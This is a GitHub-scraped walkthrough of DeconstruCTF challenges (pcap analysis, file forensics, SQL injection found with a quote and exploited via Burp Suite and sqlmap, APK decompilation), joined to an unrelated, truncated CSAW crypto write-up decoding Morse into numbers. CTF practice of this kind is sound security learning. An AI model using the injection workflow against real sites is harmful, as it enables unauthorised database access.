<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>DeconstruCTF</span></span></span><span>/</span>WalkThrough.md </h2> Go to file
<details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg>
</summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span>
</button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/deepakdhayal/DeconstruCTF/blob/3c6a6b741bbeb327bf484529d6dfcb4acda3fd24/WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details> </div>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/deepakdhayal/DeconstruCTF/contributors/Master/WalkThrough.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment> </div>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" >
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
89 lines (48 sloc) <span></span> 3.39 KB </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg>
</div>
<div class="BtnGroup"> Raw
Blame
</div>
<div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path></svg> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> </summary>
Open with Desktop View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>DeconstruCTF</h1>WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.##Piratesopen file in wireshark.network_listen.pcap.zipFollow TCP stream.##The Missing JournalistFile can be downloaded here.the_journalist.gif.zipExtract the file.Using foremost tool, you can see another PDF.using Exiftool you can see a base64 string which is used as password for the last pdf.##Taxi Union ProblemsThere is only one input field in the website.2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.Intercept the request in burpsuit.copy the request and save it in a file and use SQLmap.Location is being displayed in the last image. Use the hint no caps.##RSA - 1##RSA - 2##ScrapsBase64 Decode##Failed LoginsMy approach might not be correct but it worked in this case.1.Rename the apk file:::: using ---mv chall.apk chall.zipd2j-dex2jar -d chall.zipjd-gui chall-dex2jar.jar</article> </div>
WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.
##Pirates
##The Missing Journalist
##Taxi Union Problems
2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.
##RSA - 1
##RSA - 2
##Scraps
Base64 Decode
##Failed LoginsMy approach might not be correct but it worked in this case.
1.Rename the apk file:::: using ---mv chall.apk chall.zip
d2j-dex2jar -d chall.zip
jd-gui chall-dex2jar.jar
</div>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go
</button></form> </details-dialog> </details>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
# Gotta Decrypt Them All
> You are stuck in another dimension while you were riding Solgaleo. You have Rotom-dex with you to contact your friends but he won't activate the GPS unless you can prove yourself to him. He is going to give you a series of phrases that only you should be able to decrypt and you have a limited amount of time to do so. Can you decrypt them all?> `nc crypto.chal.csaw.io 5001`
## A direct way
### Get the numbers
When connecting to that server at port 5001, this is received:```$ nc crypto.chal.csaw.io 5001What does this mean?---.. ....- /.---- ----- ..... /-.... ..... /..... --... /--... ...-- /-.... ---.. /.---- ----- ...-- /.---- ..--- .---- /--... --... /.---- ..--- ..--- /.---- ----- --... /.---- ..--- .---- /--... --... /-.... ---.. /-.... ..... /.---- ..--- ----- /--... --... /-.... ---.. /--... ...-- /.---- ..--- ..--- /--... ---.. /.---- ----- -.... /---.. ..... /....- ----. /--... --... /.---- ..--- ..--- /----. ----. /.---- .---- ----. /--... ----. /---.. ....- /---.. .---- /..... ..--- /--... ----. /---.. ....- /---.. ----. /..... ..--- /--... --... /-.... ---.. /-.... ----. /.---- ..--- ----- /--... ----. /-.... ---.. /.---- ----- --... /..... .---- /--... ---.. /---.. ....- /-.... ----. /..... ...-- /--... ---.. /-.... ---.. /---.. ----. /..... ----- /--... ---.. /.---- ..--- ..--- /-.... ..... /.---- ..--- .---- /--... ----. /-.... ---.. /-.... ..... /..... ----- /--... ---.. /---.. ....- /.---- ----- --... /.---- ..--- .---- /--... ---.. /---.. ....- /.---- ----- --... /..... ----- /--... --... /---.. ....- /---.. .---- /.---- .---- ----. /--... --... /-.... ---.. /-.... ----. /.---- ..--- ----- /--... ---.. /.---- ..--- ..--- /---.. ..... /.---- .---- ----. /--... ----. /-.... ---.. /--... ...-- /..... ...-- /--... ---.. /-.... ---.. /---.. ..... /.---- ..--- ----- /--... --... /---.. ....- /---.. .---- /.---- .---- ----. /--... --... /.---- ..--- ..--- /---.. ----. /..... ----- /--... ----. /---.. ....- /--... ...-- /....- ---.. /--... ----. /---.. ....- /---.. .---- /..... ..--- /--... ----. /---.. ....- /-.... ----. /..... .---- /--... ---.. /.---- ----- -.... /-.... ..... /.---- .---- ----. /--... ---.. /.---- ----- -.... /.---- ----- --... /..... ...-- /--... ----. /-.... ---.. /.---- ----- ...-- /.---- .---- ----. /--... ---.. /.---- ----- -.... /---.. ..... /..... ----- /--... ---.. /.---- ----- -.... /.---- ----- ...-- /..... ...-- /--... ---.. /---.. ....- /---.. ..... /.---- ..--- .---- /--... ---.. /---.. ....- /--... ...-- /.---- .---- ----. /--... ---.. /-.... ---.. /--... ...-- /..... ..--- /--... ---.. /.---- ----- -.... /--... --... /..... ...-- /--... ---.. /-.... ---.. /-.... ----. /.---- ..--- .---- /--... ---.. /-.... ---.. /---.. ----. /....- ----. /--... ---.. /.---- ..--- ..--- /---.. ----. /.---- ..--- ----- /--... --... /.---- ----- -.... /.---- ----- ...-- /....- ----. /--... ---.. /---.. ....- /--... --... /..... ----- /--... ----. /-.... ---.. /.---- ----- ...-- /..... ----- /--... ---.. /.---- ----- -.... /--... ...-- /....- ----. /--... ----. /---.. ....- /--... --... /.---- ..--- ..--- /--... ----. /---.. ....- /----. ----. /..... ...-- /--... --... /.---- ..--- ..--- /.---- ----- ...-- /....- ---.. /--... ---.. /.---- ..--- ..--- /---.. ----. /.---- .---- ----. /--... ----. /-.... ---.. /--... ...-- /.---- ..--- ----- /--... ---.. /.---- ----- -.... /--... ...-- /.---- ..--- ----- /--... --... /.---- ..--- ..--- /--... ...-- /..... .---- /--... ---.. /.---- ----- -.... /-.... ..... /..... ----- /--... --... /---.. ....- /-.... ..... /..... .---- /--... --... /---.. ....- /-.... ..... /..... ----- /--... ---.. /.---- ----- -.... /--... --... /.---- ..--- ..--- /--... ----. /---.. ....- /---.. ----. /.---- ..--- ----- /--... ---.. /.---- ----- -.... /.---- ----- ...-- /....- ----. /--... --... /.---- ----- -.... /.---- ----- --... /..... ...-- /--... --... /---.. ....- /--... ...-- /....- ----. /--... ---.. /---.. ....- /---.. ..... /..... ..--- /--... ---.. /.---- ..--- ..--- /--... --... /..... ...-- /--... ---.. /---.. ....- /.---- ----- --... /....- ---.. /--... ---.. /.---- ..--- ..--- /--... ...-- /..... ----- /--... ---.. /---.. ....- /---.. .---- /..... ...-- /--... ---.. /.---- ----- -.... /-.... ..... /....- ----. /--... --... /.---- ..--- ..--- /---.. ----. /.---- ..--- .---- /--... ---.. /.---- ----- -.... /-.... ----. /.---- ..--- ----- /--... ---.. /.---- ..--- ..--- /---.. ..... /....- ----. /--... ----. /---.. ....- /-.... ..... /....- ----. /--... ---.. /.---- ..--- ..--- /----. ----. /.---- ..--- ..--- /--... --... /-.... ---.. /---.. ..... /....- ----. /--... ---.. /---.. ....- /.---- ----- ...-- /....- ----. /--... ---.. /.---- ----- -.... /.---- ----- ...-- /.---- ..--- .---- /--... ----. /---.. ....- /-.... ..... /.---- .---- ----. /--... --... /---.. ....- /---.. ----. /..... ...-- /--... --... /---.. ....- /.---- ----- --... /.---- .---- ----. /--... ----. /---.. ....- /.---- ----- --... /....- ----. /--... --... /-.... ---.. /--... ...-- /..... ----- /--... ---.. /.---- ----- -.... /---.. .---- /.---- ..--- ..--- /--... --... /-.... ---.. /.---- ----- ...-- /..... ...-- /--... --... /.---- ----- -.... /-.... ----. /.---- .---- ----. /--... ----. /---.. ....- /---.. .---- /.---- ..--- ----- /--... ---.. /.---- ..--- ..--- /---.. ----. /.---- ..--- ..--- /--... --... /.---- ..--- ..--- /----. ----. /....- ---.. /--... ---.. /.---- ----- -.... /---.. .---- /....- ----. /--... --... /.---- ..--- ..--- /---.. ..... /.---- ..--- .---- /--... ----. /-.... ---.. /.---- ----- --... /..... .---- /--... ---.. /.---- ----- -.... /---.. ..... /....- ----. /--... ---.. /-.... ---.. /-.... ----. /..... ..--- /--... ---.. /-.... ---.. /---.. ..... /..... ----- /--... --... /-.... ---.. /--... --... /.---- .---- ----. /--... --... /-.... ---.. /---.. ..... /.---- .---- ----. /--... ---.. /-.... ---.. /-.... ..... /..... ...-- /--... ----. /---.. ....- /-.... ..... /..... ..--- /--... --... /.---- ..--- ..--- /--... --... /.---- ..--- ----- /--... ---.. /.---- ..--- ..--- /-.... ..... /.---- ..--- ..--- /--... ----. /---.. ....- /.---- ----- --... /..... ...-- /--... ---.. /---.. ....- /.---- ----- --... /....- ----. /--... --... /.---- ..--- ..--- /-.... ----. /..... ----- /--... ----. /-.... ---.. /--... --... /..... ----- /--... ---.. /.---- ----- -.... /--... ...-- /..... ----- /--... --... /-.... ---.. /.---- ----- ...-- /.---- .---- ----. /--... --... /-.... ---.. /-.... ..... /.---- ..--- ----- /--... --... /-.... ---.. /--... ...-- /..... .---- /--... ---.. /-.... ---.. /-.... ----. /..... ...-- /-.... --... /.---- ----- ----. /---.. ..... /.---- ----- ...-- /---.. ----- /---.. ...-- /-.... ..... /.---- ..--- ..--- /-.... --... /.---- ----- ----. /--... --... /.---- ----- ...-- /---.. ----- /---.. ...-- /-.... ..... /.---- ..--- ----- /--... ---.. /---.. ....- /--... ...-- /.---- ..--- ----- /--... ---.. /.---- ----- -.... /----. ----. /....- ---.. /--... --... /.---- ----- -.... /---.. .---- /.---- ..--- .---- /--... ---.. /.---- ..--- ..--- /--... --... /..... ...-- /--... ---.. /.---- ..--- ..--- /----. ----. /....- ---.. /--... --... /.---- ..--- ..--- /---.. ----. /..... .---- /--... --... /-.... ---.. /--... ...-- /..... ..--- /--... ----. /---.. ....- /-.... ..... /.---- ..--- .---- /--... ---.. /.---- ..--- ..--- /--... --... /.---- ..--- .---- /--... ---.. /.---- ..--- ..--- /---.. .---- /....- ----. /--... --... /-.... ---.. /-.... ----. /..... .---- /--... --... /.---- ..--- ..--- /---.. .---- /.---- .---- ----. /--... --... /---.. ....- /--... ...-- /..... .---- /--... ---.. /.---- ----- -.... /---.. ..... /..... ..--- /--... ----. /-.... ---.. /--... ...-- /....- ---.. /--... ----. /-.... ---.. /----. ----. /.---- .---- ----. /--... --... /-.... ---.. /.---- ----- ...-- /.---- ..--- ..--- /--... --... /.---- ..--- ..--- /.---- ----- ...-- /..... ...-- /--... ---.. /.---- ..--- ..--- /--... --... /.---- ..--- .---- /--... --... /.---- ..--- ..--- /--... ...-- /....- ----. /--... --... /-.... ---.. /--... ...-- /.---- ..--- ----- /--... ---.. /.---- ..--- ..--- /-.... ..... /.---- ..--- ..--- /--... ---.. /---.. ....- /---.. ----. /.---- ..--- ..--- /--... ---.. /.---- ..--- ..--- /---.. ..... /.---- ..--- ----- /--... ---.. /-.... ---.. /.---- ----- ...-- /..... ..--- /--... --... /---.. ....- /.---- ----- ...-- /..... ----- /--... --... /-.... ---.. /.---- ----- --... /..... ----- /--... --... /.---- ----- -.... /-.... ----. /..... ..--- /--... ---.. /.---- ----- -.... /--... --... /..... ...-- /--... ---.. /.---- ..--- ..--- /---.. ..... /.---- ..--- .---- /--... ---.. /---.. ....- /---.. ----. /-.... .----```
That seems Morse. After [decoding](https://www.dcode.fr/code-morse) it (with `.`=short and `-`=long), we get:```84 105 65 57 73 68 103 121 77 122 107 121 77 68 65 120 77 68 73 122 78 106 85 49 77 122 99 119 79 84 81 52 79 84 89 52 77 68 69 120 79 68 107 51 78 84 69 53 78 68 89 50 78 122 65 121 79 68 65 50 78 84 107 121 78 84 107 50 77 84 81 119 77 68 69 120 78 122 85 119 79 68 73 53 78 68 85 120 77 84 81 119 77 122 89 50 79 84 73 48 79 84 81 52 79 84 69 51 78 106 65 119 78 106 107 53 79 68 103 119 78 106 85 50 78 106 103 53 78 84 85 121 78 84 73 119 78 68 73 52 78 106 77 53 78 68 69 121 78 68 89 49 78 122 89 120 77 106 103 49 78 84 77 50 79 68 103 50 78 106 73 49 79 84 77 122 79 84 99 53 77 122 103 48 78 122 89 119 79 68 73 120 78 106 73 120 77 122 73 51 78 106 65 50 77 84 65 51 77 84 65 50 78 106 77 122 79 84 89 120 78 106 103 49 77 106 107 53 77 84 73 49 78 84 85 52 78 122 77 53 78 84 107 48 78 122 73 50 78 84 81 53 78 106 65 49 77 122 89 121 78 106 69 120 78 122 85 49 79 84 65 49 78 122 99 122 77 68 85 49 78 84 103 49 78 106 103 121 79 84 65 119 77 84 89 53 77 84 107 119 79 84 107 49 77 68 73 50 78 106 81 122 77 68 103 53 77 106 69 119 79 84 81 120 78 122 89 122 77 122 99 48 78 106 81 49 77 122 85 121 79 68 107 51 78 106 85 49 78 68 69 52 78 68 85 50 77 68 77 119 77 68 85 119 78 68 65 53 79 84 65 52 77 122 77 120 78 122 65 122 79 84 107 53 78 84 107 49 77 122 69 50 